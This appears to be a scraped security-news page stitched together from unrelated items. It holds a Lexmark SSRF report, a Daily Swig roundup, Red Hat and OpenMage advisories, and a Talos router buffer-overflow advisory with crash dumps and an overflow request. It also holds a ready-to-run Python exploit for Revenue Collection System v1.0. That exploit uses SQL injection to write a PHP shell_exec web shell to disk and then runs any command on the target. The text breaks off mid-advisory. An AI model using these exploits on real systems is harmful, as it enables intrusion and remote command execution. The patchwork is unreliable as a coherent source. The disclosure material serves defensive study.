A nasty SSRF bug in Web Services plagues a laundry list of enterprise printers.

A critical security vulnerability allowing remote code execution (RCE) affects more than 120 different Lexmark printer models, the manufacturer warned this week.

And, there's proof of concept (PoC) exploit code circulating publicly, it added — though so far, in-the-wild attacks have yet to materialize.

The bug (CVE-2023-23560), which carries a score of 9 out of 10 on the CVSS vulnerability-severity scale, is a server-side request forgery (SSRF) vulnerability in the "Web Services feature of newer Lexmark devices," according to the print giant's advisory (PDF).

The printers have an embedded Web server that allows users to view and remotely configure printer settings via an Internet portal. In a typical SSRF attack, an attacker can take over such a server and force it to make a connection either to internal resources housing sensitive information; or to external systems serving malware (or harvesting things like tokens and credentials).

Enterprise printers are a stealth entryway for threat actors into enterprise environments — but are often overlooked by IT security. However, as the community saw with the now-infamous "PrintNightmare" RCE flaw in Microsoft's Windows Print Spooler that sent security teams scrambling, they often have privileged access to internal resources, and that can be problematic.

Lexmark has issued a firmware patch and noted that disabling Web Services on TCP port 65002 altogether will also do the trick for protection.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Critical RCE Lexmark Printer Bug Has Public Exploit

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Adam Bannister 27 January 2023 at 16:48 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

“A far-reaching, catastrophic cyber event is likely in the next two years” according to 93% of cybersecurity experts and 86% of business leaders polled by the World Economic Forum (WEF).

Geopolitical instability and the enduring shortage of cybersecurity skills are making the situation more precarious and causing firms to rethink their presence in certain regions, revealed the WEF’s Global Cybersecurity Outlook 2023 report, which canvassed the views of 300 experts and C-suite executives.

In the meantime, we’re still seeing plenty of very, very bad cyber-attacks and breaches. Most recently, there’s been another mega breach at T-Mobile (37 million customers affected this time), the theft of source code and ensuing $10 million ransom demand from video games developer Riot Games, and the inadvertent exposure by an airline of the US government’s No Fly List, a roll call of suspected terrorists, from 2019.

The LastPass situation is also continuing to evolve following the November breach of its password vaults in November, with the latest update from the beleaguered password manager admitting that “a threat actor exfiltrated encrypted backups from a third-party cloud storage service”.

While rival services will no doubt spy an opportunity to grow their market share given the market leader’s reputational crash, the hack is also perhaps bringing unprecedented scrutiny to the hitherto highly regarded field. Indeed, The Daily Swig recently reported on how several popular password managers auto-filled credentials on untrusted websites, while Bitwarden responded to renewed criticism of its encryption scheme by enhancing its default security configuration.

A fruitful security audit of Git’s source code is another notable story we covered since the last edition of Deserialized.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   OpenText / Critical / Pre-auth RCEs via cs.exe and Java frontend plus multiple post-authentication vulnerabilities / Disclosed with patch January 17
*   Rancher API / Critical / A patch rolled out in September 2022 failed to stop secrets, encryption keys, and SSH keys from being stored in plaintext directly on Kubernetes objects like Clusters / Disclosed and patched January 26
*   Tiki Tiki CMS / Critical / Unauthenticated attackers could execute arbitrary code by combining CSRF with PHP object injection in the popular open source, wiki-based CMS / Patched August 23, disclosed January 9
*   VMware vRealize Log Insight / Critical / Directory traversal, broken access control, deserialization, information disclosure vulnerabilities / Disclosed with patch January 24
*   Zoho manageEngine / Critical / PoC and in-the-wild exploitation raises the stakes regarding patching on premise Zoho ManageEngine products against this RCE vulnerability after a surfaced / Disclosed and patched October 27

**Research and attack techniques**

*   Vulnerabilities in popular open source health records and medical practice management platform OpenEMR allowed remote attackers to execute arbitrary system commands on any OpenEMR server and to steal sensitive patient data – and worse still, remote code execution (courtesy of Sonar)
*   Jerry Shah recounts how he found an API misconfiguration on a SwaggerUI endpoint in an unnamed web application on a private bug bounty program that leaked the authorization token from local storage
*   ChatGPT lowers the barriers to entry for threat actors with limited programming or technical skills, but state-backed miscreants are unlikely to gain operational efficiencies from the unnervingly sophisticated chatbot tool, according to Recorded Future
*   Maksym Yaremchuk – number 80 on HackerOne’s all-time leaderboard, no less – details a pair of critical severity account takeover exploits fashioned during an engagement with a private bug bounty program
*   GitHub researcher Man Yue Mo achieves arbitrary kernel code execution and root on a Google Pixel 6 mobile phone from an Android app

ChatGPT lowers the barriers to entry for cybercrime but is of little use to state-backed cybercrooks

**Bug bounty / vulnerability disclosure**

*   Security researchers can mathematically prove the existence of a software vulnerability without revealing details that in the wrong hands could lead to malicious exploitation, explains a recent New Scientist feature (paywall)
*   Intigriti has penned a blog post on the safe harbor clause for researchers created by the Belgian Act on the Protection of Whistleblowers
*   The Daily Swig recently reported on the upcoming third annual Hack The Pentagon challenge, CORS misconfigurations at Tesla and other, unnamed programs earning researchers a “few thousand dollars”, and Google Cloud Platform (GCP) project vulnerabilities netting researchers more than $22,000
*   Other recent writeups include a $3,000 bounty for a reflected XSS in Microsoft Forms, while Bug Bounty Switzerland’s inaugural ‘vulnerability of the month’ related to a time-limited private program and thousands of appliances exposed to the internet
*   Bug hunter interviews with British hacker and YouTuber ‘InsiderPhD’ and ‘TodayIsNew’ have been published by HackerOne and Bugcrowd, respectively

**New open source infosec/hacking tools**

*   Gato – or GitHub Attack Toolkit – evaluates the impact of compromised personal access tokens within GitHub development environments. Enables tracking of public repos that use self-hosted runners, which GitHub recommends are only deployed in private repos because otherwise “forks of your public repository can potentially run dangerous code on your self-hosted runner machine by creating a pull request that executes the code in a workflow”
*   Highlighter And Extractor (HaE) – Paris-based crowdsourced security platform YesWeHack has released a Burp Suite extension that collects, categorizes, and highlights requests and/or responses to help detect vulnerable code patterns, errors, reflections, and more in a passive enumeration process
*   PyCript – Another Burp Suite extension, this time allowing the bypassing of client-side encryption via custom logic for manual and automation testing with Python and NodeJS
*   SeeProxy – Golang reverse proxy with CobaltStrike malleable profile validation
*   CVE-2022-47966 Scanner – Assess your exposure to the critical RCE bug affecting at least 24 on-premise ManageEngine products and currently being actively exploited

**More industry news**

*   NIST trails potential updates (PDF) to the NIST Cybersecurity Framework and invites the infosec community to offer feedback
*   In other US federal agency news, the NSA issues IPv6 security guidance (PDF), CISA updates best practices for mapping to Mitre Attack Framework (PDF), and CISA, NSA, and MS-ISAC jointly warn (PDF) of malicious use of legitimate remote monitoring and management (RMM) software
*   Google documents progress on leveraging case randomization of DNS query names sent to authoritative nameservers in order to mitigate the impact of cache poisoning attacks
*   Google also follows through on its intention to drop TrustCor Systems as a root certificate authority (CA) for Chrome, confirming a timetable for ceasing to recognize its certificates
*   Cloud-based cyber-attacks jump 48% year on year as malicious hackers spy opportunities in digital transformation trend – Check Point report

PREVIOUS EDITION Deserialized web security roundup – Slack and Okta breaches, lax US government passwords report, and more

Deserialized web security roundup: ‘Catastrophic cyber events’, another T-Mobile breach, more LastPass problems

Red Hat Security Advisory 2023-0469-01 - Red Hat Integration Camel Extensions for Quarkus 2.13.2 is now available. Issues addressed include denial of service and memory exhaustion vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Integration Camel Extensions For Quarkus 2.13.2  
Advisory ID:       RHSA-2023:0469-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0469  
Issue date:        2023-01-26  
CVE Names:         CVE-2022-40149 CVE-2022-40150 CVE-2022-40151   
                   CVE-2022-40152 CVE-2022-40153 CVE-2022-40154   
                   CVE-2022-40155 CVE-2022-40156 CVE-2022-42003   
                   CVE-2022-42004 CVE-2022-42889   
=====================================================================

1. Summary:

Red Hat Integration Camel Extensions for Quarkus 2.13.2 is now available.  
The purpose of this text-only errata is to inform you about the security  
issues fixed.

Red Hat Product Security has rated this update as having an impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat Integration - Camel Extensions for Quarkus 2.13.2 serves as a  
replacement for 2.7 and includes the following security fixes.

Security Fix(es):

* jettison: memory exhaustion via user-supplied XML or JSON data  
(CVE-2022-40150)

* jettison: parser crash by stackoverflow (CVE-2022-40149)

* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)

* commons-text: apache-commons-text: variable interpolation RCE  
(CVE-2022-42889)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40151)

* woodstox-core: woodstox to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40152)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40153)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40155)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40156)

* xstream: Xstream to serialise XML data was vulnerable to Denial of  
Service attacks (CVE-2022-40154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2128959 - CVE-2022-40154 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2134288 - CVE-2022-40156 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2134289 - CVE-2022-40155 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2134290 - CVE-2022-40153 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2134291 - CVE-2022-40152 woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks  
2134292 - CVE-2022-40151 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data  
2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow

5. References:

https://access.redhat.com/security/cve/CVE-2022-40149  
https://access.redhat.com/security/cve/CVE-2022-40150  
https://access.redhat.com/security/cve/CVE-2022-40151  
https://access.redhat.com/security/cve/CVE-2022-40152  
https://access.redhat.com/security/cve/CVE-2022-40153  
https://access.redhat.com/security/cve/CVE-2022-40154  
https://access.redhat.com/security/cve/CVE-2022-40155  
https://access.redhat.com/security/cve/CVE-2022-40156  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q1  
https://access.redhat.com/documentation/en-us/red_hat_integration/2023.q1

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9KrldzjgjWX9erEAQiSfg/8CzU3VwZ40lPgz1S/mDjItoqotqkakk1D  
OBMtX5UNOAYAS/ml8XJr4apF7RwV+O/pjIBs8ajUA1ANfDOJCF/EH3ewSmcNop7y  
xZ6lI5VkCzwlALu0shCxN05UN7i9+/mzlLuEMFxlk3QaYYenxmvKYCHvoF5uKQAm  
atG2A0xGTLo3/h+V2AfP81oVEI/1I1K4XNuFUxK6aMwUyIteLwtcUgHbrbIEkv8m  
WcXaoc8q2BEc3pgLP4EqThIKe87ltlCrMnbM5cJri45kAPX0YOJ7PGd21erOrjD+  
mvI+snP1sZM/0TRRHej/UFiCLRegCKU85ng7lA6iMKBuYPqodSMxxLMjzUEjP5KX  
4SlMNG8m1vIxXkDG+d1bn0cS5bXgp1JFSzn0j/FTcB1YKp4aiKpVL8SIAsYu9b0w  
suSXP7s+HgVvt4HtvUCw+xIJE06nYusNZS1oUuepK7uTdfUWdf6ZULLlMlxAprr3  
UzGH+UkfYZs9MsRDrzV7Q1CSz5axKYDxny4XljK6il3PjgCyADytBLkHfqIZCxHM  
j2G2GbpV98JavSG2DssmOeUFeblsT2LrDMXk01+WpQCtZ+QqVA12g57SooMYByOP  
EcpNNHuA9nHCuq30yQbUuA35RwX42a4pAXMGGtVBBLxJ2rqtWjHUjHfhSrdPXrzx  
yh55hcgmPBM=  
=AiQH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0469-01

Red Hat Security Advisory 2023-0471-01 - An update is now available for Migration Toolkit for Runtimes (v1.0.1). Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Migration Toolkit for Runtimes security update  
Advisory ID:       RHSA-2023:0471-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0471  
Issue date:        2023-01-26  
CVE Names:         CVE-2022-3517 CVE-2022-25914 CVE-2022-37603   
                   CVE-2022-42003 CVE-2022-42004 CVE-2022-42920   
=====================================================================

1. Summary:

An update is now available for Migration Toolkit for Runtimes (v1.0.1).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* jib-core: RCE via the isDockerInstalled (CVE-2022-25914)  
* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)  
* nodejs-minimatch: ReDoS via the braceExpand function (CVE-2022-3517)  
* loader-utils: Regular expression denial of service (CVE-2022-37603)  
* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)  
* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2134344 - CVE-2022-25914 jib-core: RCE via the isDockerInstalled  
2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service  
2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

5. References:

https://access.redhat.com/security/cve/CVE-2022-3517  
https://access.redhat.com/security/cve/CVE-2022-25914  
https://access.redhat.com/security/cve/CVE-2022-37603  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes&downloadType=distributions

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9KrktzjgjWX9erEAQhAgQ//XBC9o9VYI+ndpTTSa0Xe8i7wf+gwsK5f  
cJV5aaxzrf+OXlNDX6TdRHXmUsiIsT8MkliiegKStsKr5ZeJeJ40l4AFytlMAL3D  
2WtkFIznUcnQfjy//HkEkR1TcMoun2jIoUOym4ILymQNdzEFkE9ALx8xtISWxvqY  
X+Ro97Iw9ecwfLu7OrdlKuLJhEOBK/tCqPY5DGEkc8egxELfWmCIDY+/VFrPui/C  
HtI4+rOcRGTW6eS7zjNBcovsEAzh0+uw6pdRLklGpEbRxYWy7rrfL5a6k1xuVb7q  
UGiUocfVzjM8fGOmifnG8cQrTO16w+EbNa5gtk4j7XJdYFI1B3mdfuYkz7EOd6tY  
FkflesNFmEsR2BjGOYchkxNNTSXjLjDzfzaoqUeCFU8gWNaRkwtUL8dKOgLwVrok  
cAH7AqYJ9pBCVDYFpB2vz9EW6cUDvYkkki8WckEDjG7Y0b66fmzous8qz9xIsCoN  
0PJRM1vSnrTNYq1p/DWq0bHY4cQJ+yIIcDVzOdAblsGStk9TLaNcklpnyc5TNmYL  
hp8+3keJ7LXRHInNn9ev+4askstdUNCvUymfZY/GxAAXUlr0inPOGEnNZB35d1n4  
iok2xXLiCJQpfiUYaT3Ch2NiJ/0xz5miDchjWpWRKmeqXJyvUtaiF5cDlci8NvzJ  
AwLDrG6Ja/g=  
=Quha  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0471-01

### Impact
An administrator with the permissions to upload files via DataFlow and to create products was able to execute arbitrary code via the convert profile. 




**DataFlow upload remote code execution vulnerability**

High severity GitHub Reviewed Published Jan 27, 2023 in OpenMage/magento-lts • Updated Jan 27, 2023

GHSA-h632-p764-pjqm: DataFlow upload remote code execution vulnerability

### Impact
A layout block was able to bypass the block blacklist to execute remote code.




**Fix for authenticated remote code execution through layout update**

High severity GitHub Reviewed Published Jan 27, 2023 in OpenMage/magento-lts • Updated Jan 27, 2023

GHSA-5j2g-3ph4-rgvm: Fix for authenticated remote code execution through layout update

### Impact
Magento admin users with access to the customer media could execute code on the server.



**Fix for arbitrary file deletion in customer media allows for remote code execution**

High severity GitHub Reviewed Published Jan 27, 2023 in OpenMage/magento-lts • Updated Jan 27, 2023

GHSA-5vpv-xmcj-9q85: Fix for arbitrary file deletion in customer media allows for remote code execution

An access control issue in Revenue Collection System v1.0 allows unauthenticated attackers to view the contents of /admin/DBbackup/ directory.

    # Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to #   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.#   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.#   Ex: python3 rcsv1.py 10.10.14.2 "ls"import sys, requestsdef main():  if len(sys.argv) != 3:    print("(+) usage: %s <target> <cmd>" % sys.argv[0])    print('(+) eg: %s 192.168.121.103 "ls"'  % sys.argv[0])    sys.exit(-1)  targetIP = sys.argv[1]  cmd = sys.argv[2]  s = requests.Session()    # Define obscure filename and command parameter to limit exposure and usage of the RCE.  FILENAME = "youcantfindme.php"  CMDVAR = "ohno"    # Define the SQL injection string  sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)    # Write the PHP file to disk using the SQL injection vulnerability  url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)  r1 = s.get(url1)    # Execute the user defined command and display the result  url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)  r2 = s.get(url2)  print(r2.text)  if __name__ == '__main__':  main()

CVE-2022-46967: Revenue Collection System 1.0 SQL Injection

A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

    void downfile.cgi(void)
    
    {
      [...]
    
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename = "";
      if (_filename_param != (char *)0x0) {
        filename = _filename_param;
      }
      [... calculate base_folder ...]
      if (*filename != '\0') {
        sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
        send_header(200,buff,"application/tomato-binary-file",0);
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        do_file(buff);                                                                                              [3]
      }
      return;
    }
    

The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the _filename parameter is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could led to remote code execution.

**Crash Information**

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x61666b61 ("akfa"?)
    $r5  : 0x61676b61 ("akga"?)
    $r6  : 0x61686b61 ("akha"?)
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39070  →  "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61696b60 ("`kia"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39070│+0x0000: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"     ← $sp
    0x7ef39074│+0x0004: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0008: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x000c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39080│+0x0010: "aknaakoaakpaakqaakraaksaaktaak"
    0x7ef39084│+0x0014: "akoaakpaakqaakraaksaaktaak"
    0x7ef39088│+0x0018: "akpaakqaakraaksaaktaak"
    0x7ef3908c│+0x001c: "akqaakraaksaaktaak"
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61696b60
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61696b60 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /downfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 1119
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>
    

The status at the return address of the downfile.cgi function would be:

    $r0  : 0x0       
    $r1  : 0x0       
    $r2  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r3  : 0x2000    
    $r4  : 0x7ef38c60  →  "/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]"
    $r5  : 0x00031082  →  "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"
    $r6  : 0x0002272b  →  "/jffs"
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e658  →  "downfile.cgi"
    $r10 : 0x0001dbac  →  0x0001e658  →  "downfile.cgi"
    $r11 : 0x7ef3b784  →  "admin"
    $r12 : 0x2ae5573c  →  0x2ae41ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ef39060  →  "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"
    $lr  : 0x2ae3bb30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000f96c  →   pop {r4,  r5,  r6,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ef39060│+0x0000: "akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]"    ← $sp
    0x7ef39064│+0x0004: "akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]"
    0x7ef39068│+0x0008: "akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]"
    0x7ef3906c│+0x000c: "akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39070│+0x0010: "akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39074│+0x0014: "akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef39078│+0x0018: "aklaakmaaknaakoaakpaakqaakraaksaaktaak"
    0x7ef3907c│+0x001c: "akmaaknaakoaakpaakqaakraaksaaktaak"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xf960                  mov    r0,  sp
           0xf964                  bl     0xbbc8
           0xf968                  add    sp,  sp,  #1024   ; 0x400
     →     0xf96c                  pop    {r4,  r5,  r6,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xf96c in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xf96c → pop {r4,  r5,  r6,  pc}
    [#1] 0x2ae3bb30 → free()
    

So the next instruction will populate the pc with the fourth dword contained in the stack, so:

    gef➤  hexdump dw $sp
    0x7ef39060│+0x0000   0x61666b61   
    0x7ef39064│+0x0004   0x61676b61   
    0x7ef39068│+0x0008   0x61686b61   
    0x7ef3906c│+0x000c   0x61696b61   
    [...]
    

After the pop the pc will contain the 0x61696b61 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38459: TALOS-2022-1608 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

